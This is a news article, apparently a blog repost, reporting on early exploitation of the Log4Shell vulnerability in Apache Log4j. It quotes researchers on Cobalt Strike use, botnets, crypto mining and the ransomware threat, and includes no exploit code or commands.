![]() “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” Talos researchers said. Researchers have also said that exploits of the vulnerability may have begun as far back as December 1 or December 2.Ĭisco Talos said it has discovered attacker activity related to the Log4Shell vulnerability starting on December 2. However, “this is just the beginning, and we will be seeing this for a long time,” Koehler said. “It’s a little early to hear of anything serious right now,” Koehler said. In terms of Log4Shell, managed detection and response firm Huntress so far has “not seen any serious attacks on our partners and their customers,” said Roger Koehler, vice president of threat ops at the company, in an email. And the average ransomware payment has surged by about 63% in 2021, reaching $1.79 million, the report said. A recent survey from CrowdStrike found that 66% of organizations had experienced a ransomware attack in the previous 12 months, up from 56% in 2020. The vulnerability comes with the majority of businesses already reporting that they’ve had first-hand experience with ransomware over the past year. It may only be a “matter of days” before ransomware might be deployed in connection with the vulnerability in Log4j, said David Warshavski, vice president of enterprise security at cybersecurity vendor Sygnia, in an email to VentureBeat.ĭue to the broad reach of the vulnerability in Log4j, “the bar for ransomware threat actors to breach enterprise networks and establish an initial foothold has been lowered significantly,” Warshavski said. Ransomware threatĭeployment of malware that takes advantage of Log4Shell has already begun, with researchers reporting they’ve observed the use of Mirai and Muhstik botnets to deploy distributed denial of service (DDoS) attacks, as well as deployment of Kinsing malware for crypto mining. “As the use of Cobalt Strike increases among ransomware operators, Accenture Security and Carbon Black have, in turn, observed attackers use Cobalt Strike Beacon capabilities, such as named pipes over Server Message Block (SMB) and WinRM to move laterally in targeted networks,” the researchers said in the post. The Cobalt Strike tool is useful both because of its effectiveness-the tool launches a “beacon” enabling actions such as remote surveillance and lateral movement-as well as the “anonymity” it offers due to its popularity, VMware and Accenture researchers said in a recent threat research post. Many security researchers-including at Cisco Talos, VMware Carbon Black, and Accenture Security-have reported a significant correlation between the use of Cobalt Strike and ransomware attacks. And the tool has been “appearing in Proofpoint threat data more frequently than ever” in 2021, the company said. Use of Cobalt Strike by threat actors surged 161% in 2020, year over year, according to a recent report from Proofpoint. Popular with cybercriminalsĬobalt Strike was originally a legitimate tool for penetration testing, but a leaked version of the platform’s source code reportedly appeared on GitHub in late 2020, and researchers say the tool has increasingly been leveraged by cybercriminals. Microsoft’s report of seeing Cobalt Strike installation is notable because the tool is “commonly abused by targeted ransomware,” said Chris Doman, cofounder and chief technology officer at cyber vendor Cado Security, in an email to VentureBeat. VentureBeat has reached out to Microsoft for any updated information.Īlong with providing some of the largest platforms and cloud services used by businesses, Microsoft is a major cybersecurity vendor in its own right with 650,000 security customers. Microsoft did not provide further details on the attacks. In particular, “Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” the company said. In its blog post published Saturday, Microsoft said that “at the time of publication, the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed.” The remote code execution (RCE) vulnerability can ultimately enable an attacker to remotely access and control devices. The vulnerability affects any application that uses Apache Log4j, an open source logging library, and many applications and services written in Java are potentially vulnerable.Īlong with being widespread, the flaw is also considered highly dangerous because it’s seen as fairly easy to exploit. The Log4Shell vulnerability was revealed late Thursday and impacts a broad swath of enterprise software and cloud services. At the time of this writing, no ransomware groups are publicly known to have exploited the vulnerability in Log4j to deploy a ransomware attack.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |